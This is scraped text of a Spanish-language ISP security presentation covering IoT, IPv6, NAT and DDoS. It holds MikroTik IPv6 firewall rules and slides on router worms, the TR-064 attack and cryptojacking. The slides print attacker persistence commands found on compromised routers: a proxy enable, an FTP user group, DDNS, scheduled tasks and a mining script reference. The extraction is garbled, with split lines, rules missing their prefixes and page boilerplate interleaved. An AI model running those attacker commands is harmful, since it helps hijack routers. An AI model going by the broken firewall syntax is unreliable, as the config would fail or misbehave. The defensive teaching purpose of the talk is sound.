Parameter problem (type 4, code 2)" disabled=no icmp-options=4:2
protocol=icmpv6
add action=accept chain=ICMPv6_Common comment="Accept Echo

request (type 128)" disabled=no icmp-options=128:0-255
protocol=icmpv6
add action=accept chain=ICMPv6_Common comment="Accept Echo

reply (type 129)" disabled=no icmp-options=129:0-255 protocol=icmpv6
add action=jump chain=input comment="Jump to ICMPv6_Input"

disabled=no jump-target=ICMPv6_Input protocol=icmpv6

Firewall Rules
add action=jump chain=input comment="Jump to ICMPv6_Input"

disabled=no jump-target=ICMPv6_Input protocol=icmpv6
add action=jump chain=input comment="Jump to ICMPv6_Common"

disabled=no jump-target=ICMPv6_Common protocol=icmpv6
add action=log chain=input comment="Log remaining ICMPv6"

disabled=no log-prefix=Input-remaining protocol=icmpv6

Firewall Rules
add action=drop chain="Illegal Addresses" comment=\

"Drop our own prefix as source addres if coming from outside"
disabled=no \
in-interface=ether1 src-address=2001:db8::/32
"Bogons prefixes based on address list created from cymru BGP
session" \
disabled=no src-address-list=IPv6-bogons
add action=drop chain="Illegal Addresses" comment="Loopback
Address" \
disabled=no src-address=::1/128
add action=drop chain="Illegal Addresses" comment="IPv4 Compatible
addresses" \
disabled=no src-address=::/96

Firewall Rules

"Other Compatible Addresses" disabled=no src-
address=::224.0.0.0/100
add action=drop chain="Illegal Addresses" disabled=no src-address=\
::127.0.0.0/104
add action=drop chain="Illegal Addresses" disabled=no src-
address=::/104
::255.0.0.0/104

Firewall Rules
add action=drop chain="Illegal Addresses" comment="False 6to4

packets" \
disabled=no src-address=2002:e000::20/128
2002:7f00::/24
add action=drop chain="Illegal Addresses" disabled=no src-
address=2002::/24
2002:ff00::/24

Firewall Rules

2002:a00::/24
2002:ac10::/28
2002:c0a8::/32
add action=drop chain="Illegal Addresses" comment="Link Local
Addresses" \
disabled=no src-address=fe80::/10

Firewall Rules

"Site Local Addresses (dprecated)" disabled=no src-address=fec0::/10
add action=drop chain="Illegal Addresses" comment="Unique-local
packets" \
disabled=no src-address=fc00::/7
"Multicast Packets (as a source address)" disabled=no src-address=\
ff00::/8
add action=drop chain="Illegal Addresses" comment="Docummentation
Adresses" \
disabled=no src-address=2001:db8::/32

Firewall Rules

"6bone Addresses (deprecated)" disabled=no src-address=3ffe::/16
add action=jump chain=forward comment=\
"Jump to Bogons and Illegal Addresses blocking" disabled=no jump-
target=\
"Illegal Addresses"
add action=jump chain=input comment=\
"Jump to Bogons and Illegal Addresses blocking" disabled=no jump-
target=\
"Illegal Addresses"
add action=log chain=ICMPv6_Common comment=\
"Log and drop other ICMPv6 packets" disabled=no log-prefix=""
protocol=\
icmpv6

Firewall Rules
add action=log chain=ICMPv6_Common comment=\

"Log and drop other ICMPv6 packets" disabled=no log-prefix=""
protocol=\
icmpv6

Preguntas?

¡Muchas Gracias!
Nos Vemos en Punta

Cana en LACNIC 31
maia@mdbrasil.com.br

Presentation 6865 1556086901 PDF

Cargado por

Información del documento

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Presentation 6865 1556086901 PDF

Cargado por

Copyright:

Formatos disponibles

IoT + IPv6 - NAT + DDoS

Retos de seguridad y buenas

MUM Mexico 2019

Ingeniero - Electrotecnia, Electrónica con

Proveedor de acceso desde 1995;

Entrenamiento para ISPs desde 2002;

Director técnico de MD Brasil IT & Telecom;

©Copyright md brasil - direitos reservados 2

MD Brasil IT & Telecom

ISP en el interior de São Paulo - Brasil;

©Copyright md brasil - direitos reservados 3

©Copyright md brasil - direitos reservados 5

CPEs de Ubiquiti son

¡Más de 200 mil clientes de radio sin

©Copyright md brasil - direitos reservados 7

- Un script que exploraba una vulnerabilidad en el servicio

- Una vez que el equipo era infectado, él pasaba a

- Por este comportamiento se denominó "Virus"

©Copyright md brasil - direitos reservados 8

Había muchas variantes de ese "Virus, siendo que en la más

Los WISPs perdían el acceso al equipo y muchos tenían que

- Muchos clientes llegaron a quedarse sin acceso a Internet

©Copyright md brasil - direitos reservados 9

La falla era previamente conocida por el

El fabricante publicó una actualización

Por otro lado, los ISP afectados no hicieron la actualización

©Copyright md brasil - direitos reservados 11

©Copyright md brasil - direitos reservados 12

©Copyright md brasil - direitos reservados 13

- El ataque exploró el protocolo TR-064,

- El atacante exploró la vulnerabilidad

- Casi un millón de usuarios quedaron sin

©Copyright md brasil - direitos reservados 14

©Copyright md brasil - direitos reservados 15

Wikileaks publica documento da CIA mostrando

Corregida en las versiones 6.37.5 y 6.38.5 el 09 / Marzo /

©Copyright md brasil - direitos reservados 16

©Copyright md brasil - direitos reservados 17

Problema hasta entonces no descubierto,

Infectaba las máquinas de los usuarios descargando un

Corregido en las actualizaciones de Winbox> 3x

Es cierto que Mikrotik ha sido vector de la distribución de

Sin embargo, otros vendors pueden haber sido igualmente

©Copyright md brasil - direitos reservados 19

©Copyright md brasil - direitos reservados 20

©Copyright md brasil - direitos reservados 21

©Copyright md brasil - direitos reservados 22

Invasiones com fines de

©Copyright md brasil - direitos reservados 24

©Copyright md brasil - direitos reservados 25

/ip proxy set enabled=yes

/user group add name=ftpgroupe policy="ftp,read"

©Copyright md brasil - direitos reservados 27

/ip cloud set ddns-enabled=yes

©Copyright md brasil - direitos reservados 28

/system scheduler add name="Auto113" start-time=01:30:00 interval=1d

/system scheduler add name="Auto114" start-time=01:31:00 interval=1d

/system scheduler add name="Auto115" start-time=01:41:00 interval=1d

©Copyright md brasil - direitos reservados 29

JS de mineria Hash del atacante

©Copyright md brasil - direitos reservados 30

©Copyright md brasil - direitos reservados 32

©Copyright md brasil - direitos reservados 33